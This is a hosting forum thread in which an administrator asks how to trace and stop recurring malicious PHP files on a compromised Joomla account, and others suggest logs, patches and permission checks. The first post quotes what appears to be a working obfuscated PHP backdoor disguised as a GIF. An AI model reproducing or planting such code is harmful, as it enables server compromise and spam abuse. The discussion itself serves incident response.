Checking strange activity on account

[madpato]

Hello

I have a user which i believe has been hacked and sends spam, well i have CSF and it let me know which file was doing this, got rid of it (yesterday) but today more php files showed up on the same folder, so i assume this is not over. Even i got some gif files with strange code like this:

GIF89aGbkht
<?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci+SHRVBHDlmJZyRcHO4LIHhwYpIF23jtrqE5xH/vzNrOWKEcrRohb8/rM8/MzoYrJUisaymVEcXU3e3uYmGICWS3hNbcuJ04CqOoN+hfOXBpy+6cm2H3t8fNjc690MIksioMCcguOGge+Bge0W74Yji8onSj0VJ8NohT9AbVorhdRg/Dfy7DdRRfDnu1wUumZrCgLHJxzoopAQ+eGGVdYHX0p3Wm2YTnuykH00KiEPEUQzoojGaZZXSBf27YJY8dzZNXCTOH8NHRdhifD0bh+WAUrjjlWXEuva0Um7JPz2uWfZqizFhxQbcJtTzRem3GtMjIX9gUSZCZMeWe77dZAXRKbrpNukjtqtq/iFRrT3pinaq6cIjJKZJPTACJPxw97ROdkhJ/2oH44O/E1pMEmHiL8xnFU4bk38x4MPJJEZNOv3j/YDhofUW3Hz6IE/XjhqQBhK0OuAutSD4m8QACU2O0koe0PnEJiupO7EeBNleVRbuo32l8x86hSHqhLuNPZEapgqDEA+O2p48rZTvkjfylFNfXP5IDrL+fpFaElDlAmcpWjjsEmL7ApVeY5SCg9PBoT49ynrMiegk8EFJMGW/mJQ+o4V8MJchkQJM8pevaqBrnb6mv40Nlz7LKvt+BvY/IDp39aKQcGnFQ5EhzUcmUsWk7KTOsUt6Wg9X8QgmXciZMV0FSxnoZPk0/q3Mm0pQXDU1dcF8zmIB/o8bZxEra8/S+89sgp0X0+QDYal4nQhyB/CoCYtBDUBANis2N4s4A03i4aLxvPhD94nbwq/X/CQ29u42wIEz9VfEeQnQzuZJjsZZl4E/hU=')))); ?>

Now i want to know where can i look to see the origin of this, tried ftp logs and nothing, /var/log/messages nothing regarding the location (or even mentioning the user account).
What i do know that this user has an old joomla install i know for a fact that is probably the reason of this, what i need to know is a server-side solution to stop the creation of those files. Maybe changing permission of folders?

Any ideas? Thanks.

 

[quietFinn]

You shold check that account's access logs:
/home/CPANELUSERNAME/access_logs

 

[madpato]

You shold check that account's access logs:
/home/CPANELUSERNAME/access_logs

Hi

Im afraid that directory is empty maybe i have something disabled that prevents the log from appearing??

 

[quizknows]

Check /usr/local/apache/domlogs

However, they need to update / patch their software. No amount of server-side security can make up for users running hackable applications. Do not allow people to run vulnerable appliations on your server. A good modsecurity ruleset can stop a lot of hacks but it is not foolproof.

If the file in quesiton is in public_html/images/stories/ or public_html/tmp/ they probably have a hackable com_jce component. Check the date on files inside of public_html/components/com_jce/. If they are more than a year or two old that is the easiest way for an attacker to upload that code to a joomla site.

 

[cPanelMichael]

Hello

Also, check to see if any of the directories within this account are using insecure permissions (e.g. 0777). It's possible the scripts are uploaded through a Joomla plugin that allows uploads of this nature.

Thank you.

 

[sehh]

There is another cool way they use to do this, once they compromise an account, they upload a file, execute it and delete it, while leaving the process alive and kicking in memory!

Thus, there is no file for you to find, its just not there because it deletes itself.

Once this process is started, the file will open a TCP port and listen for remote commands, execute code, upload files in tmp directories, send information about the server to a remote listener, so on and so forth.

So check the running processes, I've seen them use process names like "mysql" and similar ones.

I found their trick quite effective and imaginative!